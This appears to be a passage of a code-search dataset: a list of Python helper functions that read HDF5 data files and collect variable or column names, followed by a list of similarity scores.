self.getMaskVariableNames(product) + \\\r\n self.getMeteorologicalVariableNames(product) + \\\r\n self.getSensorVariableNames(product) + \\\r\n self.getInfoVariableNames(product)\r\n\r\n return variable_names", "def data_info(data):\n filename = data[\"filename\"]\n X_var = data[\"X_var\"]\n Y_var = data[\"Y_var\"]\n X,Y 
= read_file(filename,X_var,Y_var)\n input_dim = len(X_var)\n output_dim = len(Y_var)\n return X,Y,input_dim,output_dim", "def variables(self):\n # created variable from `get_variable`\n allname = [name for _, (name, t) in self._variable_info.iteritems()\n if t == 'variable']\n allvars = [v for v in K.get_all_variables() if v.name in allname]\n # related variables to all `Tensor`\n tensors = [self.get_variable(name)\n for name, (info, t) in self._variable_info.iteritems()\n if t == 'tensor']\n tensors = K.ComputationGraph(tensors).variables\n # all variables within the scope\n scope_vars = K.get_all_variables(scope=self.name)\n return sorted(set(allvars + tensors + scope_vars),\n key=lambda x: x.name)", "def var_name(i, j):\n return \"x_\" + str(i) + \",\" + str(j)", "def getOsiVarNames( self ):\n\n if self.osiVarNames:\n return self.osiVarNames.keys()\n \n n = self.adb.get( \"nOsiVars\" )\n for indx in xrange( n ):\n name = self.adb.get( \"osiVarName\",\n indx ) \n self.osiVarNames[ name ]= indx\n\n return self.osiVarNames.keys()", "def __splitVariableNames(self, name, indexes):\n if name == 'x':\n var = self.xCoordinates[indexes[0]][indexes[1]]\n elif name == 'y':\n var = self.yCoordinates[indexes[0]][indexes[1]]\n elif name == 'z':\n var = self.zCoordinates[indexes[0]][indexes[1]]\n elif name == 'colorMap':\n var = self.colorMapCoordinates[indexes[0]][indexes[1]]\n elif name == 'clusterLabels':\n var = self.clusterLabels[indexes[0]][indexes[1]]\n elif name == 'mixtureLabels':\n var = self.mixtureLabels[indexes[0]][indexes[1]]\n elif name == 'mixtureMeans':\n var = self.mixtureMeans[indexes[0]][indexes[1]]\n elif name == 'mixtureCovars':\n var = self.mixtureCovars[indexes[0]][indexes[1]]\n\n # The variable can contain brackets {} (when the symbol \"|\" is present in\n # the variable name), e.g.:\n # DataName|Input|{RavenAuxiliary|variableName|initial_value}\n # or it can look like:\n # DataName|Input|variableName\n\n if var is not None:\n result = [None] * 3\n if '|input|' in var.lower():\n match = re.search(r\"(\\|input\\|)\", var.lower())\n elif '|output|' in var.lower():\n match = re.search(r\"(\\|output\\|)\", var.lower())\n else:\n self.raiseAnError(IOError, f'In Plot {self.name}, the input coordinate {name} has not specified an \"Input\" or \"Output\" (case insensitive). 
e.g., sourceName|Input|aVariable) in {var}')\n startLoc, endLoc = match.start(), match.end()\n result = [var[:startLoc].strip(), var[startLoc+1:endLoc-1].strip(), var[endLoc:].strip()]\n if '{' in result[-1] and '}' in result[-1]:\n locLower, locUpper = result[-1].find(\"{\"), result[-1].rfind(\"}\")\n result[-1] = result[-1][locLower + 1:locUpper].strip()\n else:\n result = None\n\n return result", "def _variables_from_set(self, setname):\n sets = self._meta['sets']\n if not setname in sets:\n err = \"'{}' is no valid set name.\".format(setname)\n raise KeyError(err)\n else:\n set_items = sets[setname]['items']\n set_vars = [v.split('@')[-1] for v in set_items]\n return set_vars", "def get_all_variables(self):\n return []", "def getInfoVariableNames(self, product):\r\n\r\n h = product.getSceneRasterHeight()\r\n\r\n # 10m resolution\r\n if h == 10980:\r\n return self.return_available_variables(product, INFO_VARIABLE_NAMES_10m)\r\n\r\n # 20m resolution\r\n elif h == 5490:\r\n return self.return_available_variables(product, INFO_VARIABLE_NAMES_20m)\r\n\r\n # 20m resolution\r\n elif h == 1830:\r\n return self.return_available_variables(product, INFO_VARIABLE_NAMES_60m)\r\n return []", "def read_data(path):\n with h5py.File(path, 'r') as hf:\n data = np.array(hf.get('data'))\n label = np.array(hf.get('label'))\n return data, label", "def read_data_test(path):\n with h5py.File(path, 'r') as hf:\n input_ = np.array(hf.get('data'))\n label_ = np.array(hf.get('label'))\n\t\n return input_, label_", "def signal_values(filename):\n\n global standard_deviation\n f = h5py.File(filename, 'r')\n grp = np.array(f.get('/model'))\n\n for i in grp:\n ideal_signal_values[str(i[0])[2:-1]] = {cs.VALUE: i[1]}\n standard_deviation = np.array(grp[0][2])\n return ideal_signal_values", "def get_variables(self):\n return [self.g_t, self.m_t]", "def dataArr(filename):\r\n #Open the file\r\n f=h5py.File(filename,'r')\r\n \r\n #Initialize the data arrays\r\n cdata=[]\r\n idxset=[]\r\n vertices=[]\r\n \r\n #Open groups in the file\r\n for group in f.keys():\r\n# print('Group- '+group)\r\n \r\n #Get the group\r\n currGroup=f[group]\r\n \r\n #Open keys in the group\r\n for key in currGroup.keys():\r\n# print('Key- '+key)\r\n \r\n #Append the data to the respective arrays\r\n if key=='cdata(Complex)':\r\n cdataGroup=currGroup[key]\r\n \r\n imag=[]\r\n real=[]\r\n #Open the keys in cdata\r\n for subkey in cdataGroup.keys():\r\n# print('Subkey- '+subkey)\r\n \r\n #Get the real and imaginary parts of the array\r\n if subkey=='Imag':\r\n imag=cdataGroup[subkey][()]\r\n elif subkey=='Real':\r\n real=cdataGroup[subkey][()]\r\n \r\n #Convert lists to numpy arrays\r\n imag=np.array(imag)\r\n real=np.array(real)\r\n #Get the cdata value\r\n cdata=real+1j*imag\r\n \r\n elif key=='idxset':\r\n idxset=currGroup[key][()]\r\n elif key=='vertices':\r\n vertices=currGroup[key][()]\r\n \r\n #Remove the z component from the vertices\r\n xVals=[]\r\n yVals=[]\r\n newVertices=[]\r\n for vertex in vertices:\r\n xVals.append(vertex[0])\r\n yVals.append(vertex[1])\r\n newVertices.append([vertex[0],vertex[1]])\r\n vertices=newVertices\r\n \r\n #Convert to numpy arrays\r\n cdata=np.array(cdata)\r\n xVals=np.array(xVals)\r\n yVals=np.array(yVals)\r\n \r\n #Close the file\r\n f.close()\r\n \r\n return cdata, xVals, yVals", "def read_data(path):\n with h5py.File(path, 'r') as hf:\n data = np.array(hf.get('data'))\n label = np.array(hf.get('label'))\n return data, label", "def dataArr(filename):\r\n #Open the file\r\n f=h5py.File(filename,'r')\r\n 
\r\n #Initialize the data arrays\r\n cdata=[]\r\n idxset=[]\r\n vertices=[]\r\n \r\n #Open groups in the file\r\n for group in f.keys():\r\n# print('Group- '+group)\r\n \r\n #Get the group\r\n currGroup=f[group]\r\n \r\n #Open keys in the group\r\n for key in currGroup.keys():\r\n# print('Key- '+key)\r\n \r\n #Append the data to the respective arrays\r\n if key=='cdata(Complex)':\r\n cdataGroup=currGroup[key]\r\n \r\n imag=[]\r\n real=[]\r\n #Open the keys in cdata\r\n for subkey in cdataGroup.keys():\r\n# print('Subkey- '+subkey)\r\n \r\n #Get the real and imaginary parts of the array\r\n if subkey=='Imag':\r\n imag=cdataGroup[subkey][()]\r\n elif subkey=='Real':\r\n real=cdataGroup[subkey][()]\r\n \r\n #Convert lists to numpy arrays\r\n imag=np.array(imag)\r\n real=np.array(real)\r\n #Get the cdata value\r\n cdata=real+1j*imag\r\n \r\n elif key=='idxset':\r\n idxset=currGroup[key][()]\r\n elif key=='vertices':\r\n vertices=currGroup[key][()]\r\n \r\n #Remove the y component from the vertices\r\n xVals=[]\r\n yVals=[]\r\n newVertices=[]\r\n for vertex in vertices:\r\n xVals.append(vertex[0])\r\n yVals.append(vertex[2])\r\n newVertices.append([vertex[0],vertex[1]])\r\n vertices=newVertices\r\n \r\n #Convert to numpy arrays\r\n cdata=np.array(cdata)\r\n xVals=np.array(xVals)\r\n yVals=np.array(yVals)\r\n \r\n #Close the file\r\n f.close()\r\n \r\n return cdata, xVals, yVals", "def getMeteorologicalVariableNames(self, product):\r\n return []", "def read_grid(filename_grid, dim=2, slc=None):\n ## get shape and slice\n fid = h5py.File(filename_grid, 'r')\n if dim==2:\n varnames = ['x', 'y', 'ep']\n if slc is None: slc = np.s_[0,:,:]\n if dim==3:\n varnames = ['x', 'y', 'z', 'ep']\n if slc is None: slc = np.s_[:,:,:]\n\n dset = fid.get(varnames[0])\n shape = dset[slc].shape\n (nx,ny,nz) = dset.shape\n ## read variables\n grid = {}\n for varname in varnames:\n try:\n dset = fid.get(varname)\n grid[varname] = np.zeros(shape)\n dset.read_direct(grid[varname], source_sel=slc)\n grid[varname] = grid[varname].transpose()\n except:\n pass\n fid.close()\n return grid, nx, ny, nz", "def get_all_var_names(self):\n\n if hasattr(self, \"all_var_names\"):\n return self.all_var_names\n\n # Append all variables in model (defined in YAML).\n aux_all_var_names = []\n aux_all_var_names.extend(self.sim_config_params)\n aux_all_var_names.extend(self.sim_inputs)\n aux_all_var_names.extend(self.sim_outputs)\n aux_all_var_names.extend(self.sim_other_vars)\n\n # Remove duplicates (if any) -- Keeping initial order\n all_var_names = [aux_all_var_names[i] for i in range(len(aux_all_var_names)) \\\n if aux_all_var_names[i] not in aux_all_var_names[:i]]\n\n # Store for following calls\n self.all_var_names = all_var_names\n return self.all_var_names", "def extract_var_data(self, var_names):\n variable_dict = {} # Declaring dictionary used to store key-val pairs, var_name as key and the array as the value\n try:\n for var in var_names:\n variable_dict[var] = self.dataset[var].values\n return variable_dict\n except Exception as e:\n print(\"An Error occured:\", e)\n raise e", "def _find_major_vars(data):\n\n # TODO Use an Ordered Set instead to preserve order of variables in files?\n tcoord = data.attrs.get(\"metadata:bout_tdim\", \"t\")\n major_vars = set(\n var\n for var in data.data_vars\n if (tcoord in data[var].dims) and data[var].dims != (tcoord,)\n )\n minor_vars = set(data.data_vars) - set(major_vars)\n return list(major_vars), list(minor_vars)", "def dims_list(self):\n return [n for n in self.schema.names if n in 
self.dims]", "def printAllColumnsInH5(pathToData):\n\n #Check if a correct path is given\n\n if not os.path.isfile(pathToData):\n raise ValueError(\"h5 file not found. Wrong path given?\")\n elif os.path.isfile(pathToData):\n Data = h5.File(pathToData, 'r')\n\n\n Files = Data.keys()\n\n for File in Files:\n print()\n print('Filename = %s' %(File))\n print('----------------------')\n\n #Every time you see Xr*' '\n #It means I add X spaces to line it\n print('\\t column name%sunit%slength'%(29*' ',16*' '))\n print('\\t '+'-----------------'*4)\n \n #In this file give me all the column names\n columns = Data[File].keys()\n \n #for every column in the columns\n for nrc,column in enumerate(columns):\n #always want the column name printed in 40 char\n spaces = ' '*(40 - len(column))\n length = Data[File][column].shape[0]\n #always want the unit name printed over 20 chars\n unit = Data[File][column].attrs['units']\n spaces2 = ' '*(20 - len(unit))\n #--\n length = Data[File][column].shape[0]\n\n print('\\t %s%s%s%s%s'%(column,spaces, unit,spaces2, length))\n #Every 4 lines print a dashed line to read output easier\n if (nrc%5==4):\n print('\\t '+'-----------------'*4)\n Data.close()", "def _get_columns_h5lmt(self, dataset_name):\n dataset = self.__getitem__(dataset_name)\n orig_dataset_name = dataset_name.lstrip('/')\n dataset_name = dataset.name.lstrip('/')\n if dataset_name == 'MDSOpsGroup/MDSOpsDataSet' and orig_dataset_name != dataset_name:\n return numpy.array([SCHEMA_DATASET_PROVIDERS[None][orig_dataset_name]['args']['column']])\n elif dataset_name in H5LMT_COLUMN_ATTRS:\n return dataset.attrs[H5LMT_COLUMN_ATTRS[dataset_name]].astype('U')\n elif dataset_name == 'MDSCPUGroup/MDSCPUDataSet':\n return numpy.array(['_unknown'])\n elif dataset_name == 'FSMissingGroup/FSMissingDataSet':\n return numpy.array(['_unknown%04d' % i for i in range(dataset.shape[1])])\n else:\n raise KeyError('Unknown h5lmt dataset %s' % dataset_name)", "def get_vars(self):\n return [self.mu, self.var]" ]
[ "0.6690074", "0.62676114", "0.61328524", "0.60728717", "0.6032376", "0.5962701", "0.5961076", "0.5934028", "0.5920969", "0.5817062", "0.57885367", "0.57675433", "0.57535744", "0.5749644", "0.5723075", "0.57072866", "0.56532377", "0.56390136", "0.5622561", "0.56167597", "0.5583233", "0.55704904", "0.5569377", "0.55612564", "0.55557597", "0.55527127", "0.5549425", "0.55294627", "0.5500263", "0.5489356", "0.54658467", "0.5453913", "0.5433182", "0.5415193", "0.5407008", "0.5396658", "0.53921777", "0.5387869", "0.53857964", "0.5381563", "0.5377997", "0.5377066", "0.537511", "0.5374743", "0.5371084", "0.5365715", "0.5358407", "0.53537613", "0.53319097", "0.53278327", "0.5327232", "0.53179884", "0.5296841", "0.5294542", "0.5293324", "0.5286549", "0.5285852", "0.5281259", "0.5271757", "0.5269444", "0.5267832", "0.52645224", "0.52507913", "0.524848", "0.5233697", "0.5230244", "0.52298784", "0.5227499", "0.52164936", "0.52163327", "0.52089024", "0.5206909", "0.5204403", "0.5202284", "0.51878804", "0.5183257", "0.51810324", "0.5175614", "0.51751137", "0.516473", "0.51600826", "0.5156463", "0.5152288", "0.5149624", "0.5149302", "0.514825", "0.51473075", "0.5143423", "0.5139605", "0.51346165", "0.51303166", "0.5110438", "0.51103806", "0.51080567", "0.5105851", "0.5101474", "0.50953305", "0.50903165", "0.5084822", "0.5080864" ]
0.6843741
0
busy wait for robot completion
def waitrobot(robot): while not robot.GetController().IsDone(): time.sleep(0.01)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def busyWait(self):\n time.sleep(0.0)", "def waitForCompletion(self):\n\n while(json.loads(self.robot.device())['state']!=0):\n time.sleep(0.1)\n continue\n\n return", "def wait(self):\n time.sleep(0.010)", "def wait(self):\n pass", "def wait(self):\n pass", "def waitUntilFinished():", "def waitUntilFinished():", "def waitUntilFinished():", "def waitUntilFinished():", "def wait():\n pass", "def do_wait(self):\n pass", "def wait():\n time.sleep(1)", "def wait(self):\n\t\traise NotImplementedError(\"must be redeclared\")", "def check_completion(self):\n\n time.sleep(3)\n while self.status == 0:\n pass", "def wait(self):\n\t\twhile True:\n\t\t\tr1 = self.zaberSend(self.translation[\"hor\"], self.cmd[\"returnStatus\"], data=0)\n\t\t\tr2 = self.zaberSend(self.translation[\"ver\"], self.cmd[\"returnStatus\"], data=0)\n\t\t\tif r1[2] == 0 and r2[2] == 0:\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\ttime.sleep(.01)", "def run_and_wait():\n self.busy.put(True)\n action()\n self.busy.put(False)\n status._finished(success=True)", "def wait(self):\n time.sleep(self.next())", "def wait_progress(self):\n pass", "def wait_progress(self):\n pass", "def _busy_wait(self):\n wait_for = GPIO.HIGH\n if self.inky_version == 2:\n wait_for = GPIO.LOW\n\n while(GPIO.input(self.busy_pin) != wait_for):\n pass", "def waitfor(self):\r\n finished = False\r\n while finished == False:\r\n time.sleep(5)\r\n finished = self.isFinished()", "def wait(self, cycles):\n\t\tpass", "def block_waiting( self ):\n while self.num_waiting > 0:\n time.sleep( 1 )", "def wait(self, timeoout=None, state=\"C-completed\"):", "def _wait_for_completion(self):\n if self.do_timing:\n self.timer.start(\"Running.\")\n\n while self.state != State.COMPLETED:\n self._update_state()\n\n if self.do_timing:\n self.timer.stop()", "def wait(self):\n self.event.wait()", "async def wait_until_done(self) -> None:\n ...", "def wait(self):\n while not self.done:\n self.device._handle_events(1000)", "def wait(self, ms=None):\r\n util.raiseNotDefined()", "def wait_complete(self):\n self.join()", "def waitUntilSuccess():", "def wait(self):\n self.mainloop().wait()", "def wait_completion(self):\r\n self.tasks.join()", "def wait_for_time():\n while rospy.Time().now().to_sec() == 0:\n pass", "def wait(self):\n return # this method might be obsolete since wait counter is no longer used and the ai counter is handled elsewhere.\n\n #the jump method could go in Being as well.", "def wait_for_time():\n while rospy.Time().now().to_sec() == 0:\n pass", "def wait_for_time():\n while rospy.Time().now().to_sec() == 0:\n pass", "def wait_for_time():\n while rospy.Time().now().to_sec() == 0:\n pass", "def wait_forever(self):\r\n while True:\r\n time.sleep(0.5)", "def answer_waiting_call(self) -> None:", "def wait(self):\r\n self.scheduler.wait()", "def wait_until_idle(self):\n while True:\n time.sleep(self.__interface.WT_STATE_LOOKUP)\n\n if not self.is_busy:\n break", "def wait(self):\n self.drain_call_queue()", "def wait_completion(self):\n self.tasks.join()", "def wait_completion(self):\n self.tasks.join()", "def wait_completion(self):\n self.tasks.join()", "def wait_completion(self):\n self.tasks.join()", "def wait_completion(self):\n self.tasks.join()", "def wait_completion(self):\n self.tasks.join()", "def wait_completion(self):\n self.tasks.join()", "def wait_completion(self):\n self.tasks.join()", "def wait_completion(self):\n self.tasks.join()", "def waitReady(self, spin_delay=0.01):\n while not self.isReady():\n time.sleep(spin_delay)", "def wait(self):\n with 
self.__lock:\n while not self.__complete:\n self.__lock.wait()", "def busy(self):\n pass", "def wait_for_completion(self, timeout=10):\n cur_status = self.runtime_status()\n while cur_status not in ['FAILED', 'KILLED', 'FINISHED']:\n time.sleep(0.2)\n timeout -= 0.2\n cur_status = self.runtime_status()\n if timeout < 0:\n break\n\n return timeout > 0", "def wait_until_ready(self):\n while not self.is_ready():\n time.sleep(0.01)", "def wait(self):\n time.sleep(self.pause_time)", "def wait(cls, quad):\n\t\twait_time = cls.get_address_value(quad.result)\n\t\ttime.sleep(wait_time/1000.0)", "def _wait(self,):\n #modlogger.debug( \"%s: waiting\"%self)\n self.closing = True\n with self.not_complete_lock:\n if not self.not_complete: return\n self._checkpoint()", "def _busy_wait(self, timeout=40.0):\n # If the busy_pin is *high* (pulled up by host)\n # then assume we're not getting a signal from inky\n # and wait the timeout period to be safe.\n if self._gpio.input(self.busy_pin):\n warnings.warn(\"Busy Wait: Held high. Waiting for {:0.2f}s\".format(timeout))\n time.sleep(timeout)\n return\n\n # If the busy_pin is *low* (pulled down by inky)\n # then wait for it to high.\n t_start = time.time()\n while not self._gpio.input(self.busy_pin):\n time.sleep(0.01)\n if time.time() - t_start >= timeout:\n warnings.warn(\"Busy Wait: Timed out after {:0.2f}s\".format(time.time() - t_start))\n return\n\n # print(\"Busy_waited\", time.time()-t_start, \"out of\", timeout, \"seconds\")", "def wait(delay=2):\n time.sleep(delay)", "def wait(self):\n self.queue.join()", "def waitStatus(j, wtype='Load'):\n timeout = 1\n curIter = 0\n maxIter = 60\n done = False\n while not done:\n stat = j.GetStatus(wtype)\n if stat == \"complete\":\n done = True\n else:\n curIter = curIter + 1\n if curIter > maxIter:\n raise ValueError(\"timeout waiting\")\n time.sleep(timeout)", "def wait(self) -> None:\n\n self.event_.wait()", "def wait(self):\r\n self.jobs.join()", "def wait_for_acquisition(self):\n self.lib.WaitForAcquisition()", "def _wait_ready(self):\n command = self._recv_from_client()\n while command != \"READY\":\n command = self._client.recv_from_client()", "def busy_wait(self, seconds):\n end_time = time.perf_counter() + seconds\n while(time.perf_counter() < end_time):\n pass", "def _wait_while_busy(self, timeout=2):\n\t\tprinted = False\n\t\tstart_timestamp = time()\n\t\twhile self.samba.read_word(self.regs_base_address + self.FSR_OFFSET) & self.FSR_MASK['FRDY'] == 0:\n\t\t\tif not printed:\n\t\t\t\tself.LOG.debug('Flash busy')\n\t\t\t\tprinted = True\n\t\t\tif time() - start_timestamp >= timeout:\n\t\t\t\traise Exception('Flash busy: timeout. 
FSR: ' + str(self.samba.read_word(self.regs_base_address + self.FSR_OFFSET)))\n\t\t\tsleep(.001)\n\n\t\tif printed:\n\t\t\tself.LOG.debug('Flash was busy for {:.3f}s'.format(time() - start_timestamp))", "def wait_spinner(self, wait_time):\n#------affichage d'un element du cycle dans la boucle\n#----- pour montré qu'on attend \n spinner = itertools.cycle(['-', '/', '|', '\\\\'])\n \n try:\n self.logger.debug(u\"wait for max '%s' minute(s)\"%wait_time) \n time.sleep(1.0)\n#-------------------on attend que le device ne soit plus en MOVING ou on attend un period de temps \n end_time = datetime.datetime.now()+datetime.timedelta(minutes=wait_time)\n while end_time >= datetime.datetime.now() and self._ismoving():\n time.sleep(0.1)\n #affichage l'element du cycle\n sys.stdout.write(spinner.next())\n sys.stdout.flush()\n #-----effacer l'element affiché\n sys.stdout.write('\\b')\n except Exception, details :\n self.error_message.set_error_message(\"Wait error : \",str(details))\n raise", "def wait(wait_time=WAIT_TIME):\n # time.sleep(wait_time)\n pass", "def in_waiting(self) -> int:\n pass", "def wait(wait_time):\n\n time.sleep(wait_time)", "def wait_finish(self):\r\n self.proc.join()", "def wait(self, timeout=60, use_pos=False):\n dmov = self.get_pvobj(\"done_moving\")\n if not use_pos and dmov.isinitialized:\n return dmov.wait_for_value(1, timeout)\n else:\n monpv = self.get_pvobj(\"readback\")\n goal = self.get_par(\"drive\")\n deadband = self.get_par(\"retry_deadband\")\n min = goal - abs(deadband)\n max = goal + abs(deadband)\n return monpv.wait_for_range(min, max, timeout)", "def wait_for_trigger(self):\n # Read the status only to determine when the trigger occurs.\n is_running = True\n is_triggered = False\n while is_running and not is_triggered:\n status = self.hat.a_in_scan_status()\n is_running = status.running\n is_triggered = status.triggered", "def wait(self):\n for _ in range(15):\n time.sleep(10)\n if self.ready:\n break\n else:\n raise RuntimeError('timeout, lease failed to start')", "def block(self):\n while self.running:\n time.sleep( 1 )", "def wait(self, wait_timeout=10):\n if self._TransferInitiated == 0:\n return\n Error = \"DMA wait timed out.\"\n with timeout(seconds = wait_timeout, error_message = Error):\n while True:\n if libdma.XAxiDma_Busy(self.DMAengine,self.direction) == 0:\n break", "def wait(self, _id):\n while not self._actions[_id].done:\n sleep(1e-3)", "def wait(self) -> None:\n now = time.time()\n if now < self.lockTime:\n diff = self.lockTime - now\n logger.debug(\"Waiting %ss to avoid ratelimit\", diff)\n time.sleep(diff)", "def wait(self,c,time,loop):\r\n\r\n if loop==1:\r\n loopBool=True\r\n else:\r\n loopBool=False\r\n \r\n self.board.setupWait( time['ns'], loopBool)", "def wait(self):\n\t\tself.wait_window(self)\n\t\treturn self.result", "def wait_till_read_out():\n\n\trespond = send_command('waitreadout')", "def wait(self, sleep_time):\n time.sleep(sleep_time)", "def wait_for(func):\n \n while not func() and not rospy.is_shutdown():\n time.sleep(0.01)", "def _wait_before_call(self):\n while (dt.datetime.now() - self._last_call_ts) <= dt.timedelta(\n seconds=self.api_timeout\n ):\n time.sleep(0.5)\n self._last_call_ts = dt.datetime.now()", "def state_wait_do(cfg, app, win, events):", "def finishWait(self):\r\n self.scheduler.finishWait()", "def wait(self):\n return self.bot_client.send_command(_Command.Wait)" ]
[ "0.7729015", "0.7684526", "0.76390046", "0.7526746", "0.7526746", "0.7480899", "0.7480899", "0.7480899", "0.7480899", "0.7460632", "0.7429611", "0.7353933", "0.73518384", "0.7336683", "0.7308061", "0.7302214", "0.72688043", "0.7262008", "0.7262008", "0.72150105", "0.7173207", "0.7164182", "0.716261", "0.7159663", "0.7087422", "0.7077602", "0.7065622", "0.7051149", "0.7040757", "0.70143384", "0.69953376", "0.6968196", "0.6950926", "0.6903484", "0.68987846", "0.68937594", "0.68937594", "0.68937594", "0.687671", "0.68592966", "0.6836301", "0.68308175", "0.6787925", "0.6780826", "0.6780826", "0.6780826", "0.6780826", "0.6780826", "0.6780826", "0.6780826", "0.6780826", "0.6780826", "0.6763656", "0.67460495", "0.6731589", "0.672541", "0.6715848", "0.66851085", "0.666257", "0.66620004", "0.6656871", "0.6643195", "0.6606989", "0.6606071", "0.65940464", "0.6582737", "0.65803266", "0.6551968", "0.65477926", "0.6545195", "0.65271795", "0.6516402", "0.64975697", "0.64969116", "0.6476622", "0.64642596", "0.64592457", "0.6456851", "0.6452134", "0.64497423", "0.64458376", "0.6441303", "0.6433484", "0.64332896", "0.6402093", "0.6386441", "0.63817495", "0.6373843", "0.63711035", "0.6370706", "0.63447106" ]
0.8239064
8
Test that initializing a Matern1/2 kernel with 0 lengthscale raises an exception
def test_matern_zero_lengthscale(matern): with pytest.raises(ValueError) as exp: matern(lengthscale=0.0, variance=1.0, output_dim=1) assert exp.value.args[0].find("lengthscale must be positive.") >= 0
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def testZeroInput(self):\n nb.rescale_length(2.0)\n nb.rescale_length(0)\n self.assertEqual(2.0, nb.rscale)", "def testZeroInput(self):\n self.assertRaises(TypeError, nb.rscale,)", "def testKernelsNotSpecified(self):\n with self.assertRaisesRegexp(ValueError, \"`kernel_shape` cannot be None.\"):\n snt.Conv1DTranspose(output_channels=1)", "def test_nonpositive_nu_raises_exception(nu):\n with pytest.raises(ValueError):\n kernels.Matern(input_dim=1, nu=nu)", "def testKernelsNotSpecified(self):\n with self.assertRaisesRegexp(ValueError, \"`kernel_shape` cannot be None.\"):\n snt.Conv2DTranspose(output_channels=1)", "def test_gauss_kernel():\n\n gauss = gauss_kernel(2, 5)\n\n assert gauss.shape == (5, 5)\n assert gauss[2, 2] == 0.039788735772973836", "def init_kernel(cls, m):\n pass", "def testKernelShape(self):\n\n snt.Conv3D(output_channels=10, kernel_shape=[3, 4, 5], name=\"conv1\")\n snt.Conv3D(output_channels=10, kernel_shape=3, name=\"conv1\")\n\n with self.assertRaisesRegexp(snt.Error, \"Invalid kernel shape.*\"):\n snt.Conv3D(output_channels=10, kernel_shape=[3, 3], name=\"conv1\")\n snt.Conv3D(output_channels=10, kernel_shape=[3, 3, 3, 3], name=\"conv1\")", "def testKernelShape(self, use_bias):\n\n snt.Conv1D(output_channels=10, kernel_shape=[3], name=\"conv1\",\n use_bias=use_bias)\n snt.Conv1D(output_channels=10, kernel_shape=3, name=\"conv1\",\n use_bias=use_bias)\n\n err = \"Invalid kernel shape\"\n with self.assertRaisesRegexp(snt.IncompatibleShapeError, err):\n snt.Conv1D(output_channels=10, kernel_shape=[3, 3], name=\"conv1\")", "def testNoFeatureColumnsOrKernelMappers(self):\n with self.assertRaises(ValueError):\n _ = kernel_estimators.KernelLinearClassifier()", "def testKernelShape(self, use_bias):\n\n snt.Conv2D(output_channels=10, kernel_shape=[3, 4], name=\"conv1\",\n use_bias=use_bias)\n snt.Conv2D(output_channels=10, kernel_shape=3, name=\"conv1\",\n use_bias=use_bias)\n\n err = \"Invalid kernel shape\"\n with self.assertRaisesRegexp(snt.IncompatibleShapeError, err):\n snt.Conv2D(output_channels=10,\n kernel_shape=[3, 3, 3],\n name=\"conv1\")", "def test_fixedkernel(self):\r\n X = np.random.rand(30, 4)\r\n K = np.dot(X, X.T)\r\n kernel = GPy.kern.fixed(4, K)\r\n kern = GPy.kern.poly(5, degree=4)\r\n self.assertTrue(GPy.kern.kern_test(kern, verbose=verbose))", "def testKernelShape(self, use_bias):\n\n # No check against output_channels is done yet (needs input size).\n snt.SeparableConv2D(\n output_channels=1,\n channel_multiplier=2,\n kernel_shape=[3, 4],\n name=\"conv1\",\n use_bias=use_bias)\n snt.SeparableConv2D(\n output_channels=1, channel_multiplier=1, kernel_shape=3, name=\"conv1\")\n\n error_msg = (r\"Invalid kernel shape: x is \\[3], must be either a positive\"\n r\" integer or an iterable of positive integers of size 2\")\n with self.assertRaisesRegexp(snt.IncompatibleShapeError, error_msg):\n snt.SeparableConv2D(output_channels=1,\n channel_multiplier=3,\n kernel_shape=[3],\n use_bias=use_bias)", "def testKernelShape(self, use_bias):\n\n # No check against output_channels is done yet (needs input size).\n snt.SeparableConv1D(\n output_channels=1,\n channel_multiplier=2,\n kernel_shape=[3],\n name=\"conv1\",\n use_bias=use_bias)\n snt.SeparableConv1D(\n output_channels=1, channel_multiplier=1, kernel_shape=3, name=\"conv1\")\n\n error_msg = (r\"Invalid kernel shape: x is \\[3, 3\\], must be either a \"\n r\"positive integer or an iterable of positive integers of \"\n r\"size 1\")\n with self.assertRaisesRegexp(snt.IncompatibleShapeError, error_msg):\n 
snt.SeparableConv1D(output_channels=1,\n channel_multiplier=3,\n kernel_shape=[3, 3],\n use_bias=use_bias)", "def test_nu_large_recovers_rbf_kernel(x0: np.ndarray, x1: np.ndarray, input_dim: int):\n lengthscale = 1.25\n kernmat_rbf = kernels.ExpQuad(lengthscale=lengthscale, input_dim=input_dim)\n kernmat_matern = kernels.Matern(lengthscale=lengthscale, nu=15, input_dim=input_dim)\n np.testing.assert_allclose(\n kernmat_rbf(x0, x1),\n kernmat_matern(x0, x1),\n err_msg=\"RBF and Matern kernel are not equivalent for nu=infty.\",\n rtol=0.05,\n atol=0.01,\n )", "def testInvalidKernelMapper(self):\n\n class DummyKernelMapper(object):\n\n def __init__(self):\n pass\n\n feature = layers.real_valued_column('feature')\n kernel_mappers = {feature: [DummyKernelMapper()]}\n with self.assertRaises(ValueError):\n _ = kernel_estimators.KernelLinearClassifier(\n feature_columns=[feature], kernel_mappers=kernel_mappers)", "def __init__(self, dim): #, length_scale, length_scale_bounds=()):\n# assert isinstance(column, (list, tuple, int)), \"must be int or list of ints\"\n# self.column = [column] if isinstance(column, int) else column\n# assert all(isinstance(i, int) for i in self.column), \"must be integers\"\n self.dim = dim\n \n kernels = [Projection([c]) for c in range(dim)]\n\n # combine the kernels into a single product kernel\n self.kernel = reduce(lambda k0, k1 : k0 * k1, kernels)", "def testNegativeInput(self):\n nb.rescale_length(2.0)\n nb.rescale_length(-1.0)\n self.assertEqual(2.0, nb.rscale)", "def testKernelShape(self, use_bias):\n\n snt.DepthwiseConv2D(channel_multiplier=1, kernel_shape=[3, 4])\n snt.DepthwiseConv2D(channel_multiplier=1, kernel_shape=3)\n error_msg = (r\"Invalid kernel shape: x is \\[3], must be either a positive\"\n r\" integer or an iterable of positive integers of size 2\")\n with self.assertRaisesRegexp(snt.IncompatibleShapeError, error_msg):\n snt.DepthwiseConv2D(channel_multiplier=1, kernel_shape=[3],\n use_bias=use_bias, name=\"conv1\")", "def __init__(self,\n batch_size,\n max_num_context,\n x_size=1,\n y_size=1,\n l1_scale=0.6,\n sigma_scale=1.0,\n random_kernel_parameters=True,\n kernel = 'SE', #valid options {SE,PER}\n testing=False):\n self._batch_size = batch_size\n self._max_num_context = max_num_context\n self._x_size = x_size\n self._y_size = y_size\n self._l1_scale = l1_scale\n self._sigma_scale = sigma_scale\n self._random_kernel_parameters = random_kernel_parameters\n self._testing = testing\n self._kernel = kernel", "def test_conv2d_out_of_range_scale():\n np.random.seed(0)\n\n input_sc = 1024\n kernel_sc = 1024\n output_sc 